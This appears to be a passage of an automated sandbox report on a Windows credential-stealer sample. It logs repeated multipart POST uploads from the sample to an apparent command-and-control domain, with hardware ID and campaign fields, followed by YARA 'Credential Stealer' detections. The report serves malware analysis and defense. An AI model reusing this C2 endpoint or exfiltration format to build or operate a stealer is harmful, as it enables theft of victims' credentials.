    CF-RAY: 8f87c542de7f440d-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2306&min_rtt=2306&rtt_var=1153&sent=15&recv=20&lost=0&retrans=1&sent_bytes=4212&recv_bytes=15988&delivery_rate=34871&cwnd=177&unsent_bytes=0&cid=2abd17bd73056439&ts=1165&x=0"
2024-12-27 07:59:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk size line, then chunk body):
    f
    ok 8.46.123.189
2024-12-27 07:59:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.5  49722        172.67.165.185  443               5632  C:\Users\user\Desktop\AaEBZ7icLd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:59:21 UTC | 272 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=T6NABLCP2
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20513
    Host: mindhandru.buzz
2024-12-27 07:59:21 UTC | 15331 | OUT | Data Raw: 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
    Data Ascii (line breaks restored from the CR/LF bytes above; dump truncated by the report):
    --T6NABLCP2
    Content-Disposition: form-data; name="hwid"

    18FF6EFE96368310BEBA0C6A975F1733
    --T6NABLCP2
    Content-Disposition: form-data; name="pid"

    3
    --T6NABLCP2
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --T6NABLCP2
    Content-Disp
2024-12-27 07:59:21 UTC | 5182 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82
    Data Ascii (binary payload; only printable bytes rendered): un 4F([:7s~X`nO`i`
2024-12-27 07:59:22 UTC | 1132 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:59:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=gniicbi02o4jgcisa7758fmcta; expires=Tue, 22 Apr 2025 01:46:01 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kWmPQSYpYYAC06ECsEjQ3UJUXLgIBtv5%2BdID2hy13v7gLgx%2FwLIl1%2Fki6qxW90naUTjvp4x3mKRVWhD6FiKuZHh29yyE5Uod6Z7YE%2B8HaqxHCu%2BC2GP3Vdvh58AjUcpAEPQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c551f8b8425f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1631&rtt_var=623&sent=20&recv=33&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21465&delivery_rate=1742243&cwnd=216&unsent_bytes=0&cid=d355e5902e7ef88b&ts=1082&x=0"
2024-12-27 07:59:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk size line, then chunk body):
    f
    ok 8.46.123.189
2024-12-27 07:59:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.5  49728        172.67.165.185  443               5632  C:\Users\user\Desktop\AaEBZ7icLd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:59:24 UTC | 280 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=M02EWWBEYB8UUNW6QO
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1256
    Host: mindhandru.buzz
2024-12-27 07:59:24 UTC | 1256 | OUT | Data Raw: 2d 2d 4d 30 32 45 57 57 42 45 59 42 38 55 55 4e 57 36 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4d 30 32 45 57 57 42 45 59 42 38 55 55 4e 57 36 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 30 32 45 57 57 42 45 59 42 38 55 55 4e 57 36 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
    Data Ascii (line breaks restored from the CR/LF bytes above):
    --M02EWWBEYB8UUNW6QO
    Content-Disposition: form-data; name="hwid"

    18FF6EFE96368310BEBA0C6A975F1733
    --M02EWWBEYB8UUNW6QO
    Content-Disposition: form-data; name="pid"

    1
    --M02EWWBEYB8UUNW6QO
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
2024-12-27 07:59:25 UTC | 1132 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:59:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=u6astk6bkjoj5t1q0n5th0qb4h; expires=Tue, 22 Apr 2025 01:46:03 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0iChU78%2FeadZJO3X14xnKxwJVa0m1eHp%2BGxaYJenZk%2Fi6GSyRoceevivaMSu%2BV9Zc0Nd7968DL95yWgjRkYhCgM%2ByQlcEabt%2FKvasAP%2FSxGj2JPGdgq6cN5Y51uqRddwgM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c5630a8b41a6-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2474&min_rtt=2471&rtt_var=934&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2172&delivery_rate=1168000&cwnd=239&unsent_bytes=0&cid=42f62b15a88637ef&ts=800&x=0"
2024-12-27 07:59:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk size line, then chunk body):
    f
    ok 8.46.123.189
2024-12-27 07:59:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49736 | 172.67.165.185 | 443 | 5632 | C:\Users\user\Desktop\AaEBZ7icLd.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:59:27 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5KSXFNFJUILJS228X71
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 569731
Host: mindhandru.buzz
2024-12-27 07:59:27 UTC | 15331 | OUT | Data Raw: 2d 2d 35 4b 53 58 46 4e 46 4a 55 49 4c 4a 53 32 32 38 58 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 4b 53 58 46 4e 46 4a 55 49 4c 4a 53 32 32 38 58 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4b 53 58 46 4e 46 4a 55 49 4c 4a 53 32 32 38 58 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --5KSXFNFJUILJS228X71Content-Disposition: form-data; name="hwid"18FF6EFE96368310BEBA0C6A975F1733--5KSXFNFJUILJS228X71Content-Disposition: form-data; name="pid"1--5KSXFNFJUILJS228X71Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-27 07:59:29 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:59:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mdcjdcpvn6oo0m5ijkmpdbs0tg; expires=Tue, 22 Apr 2025 01:46:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1E415mwhXvVMNHmGHWoZyw%2F4dfERkUink9ZxZtUGf6zDxRB%2FR6czzwR1QXDX%2F4z0njaz1AsUo8skYCUn%2Fs7%2BFhqngNdawi88udQur50TEK6jU0uIiDm5MTn3LZXDAgpheI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c573392943f7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1557&rtt_var=598&sent=356&recv=594&lost=0&retrans=0&sent_bytes=2836&recv_bytes=572278&delivery_rate=1808049&cwnd=213&unsent_bytes=0&cid=daa59a3c67f4c1da&ts=2456&x=0"

Target ID:0
Start time:02:59:07
Start date:27/12/2024
Path:C:\Users\user\Desktop\AaEBZ7icLd.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\AaEBZ7icLd.exe"
Imagebase:0x3e0000
File size:1'883'648 bytes
MD5 hash:52135372423D0E2A9E1A9C11C188DF25
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2279704777.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2278178086.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

No disassembly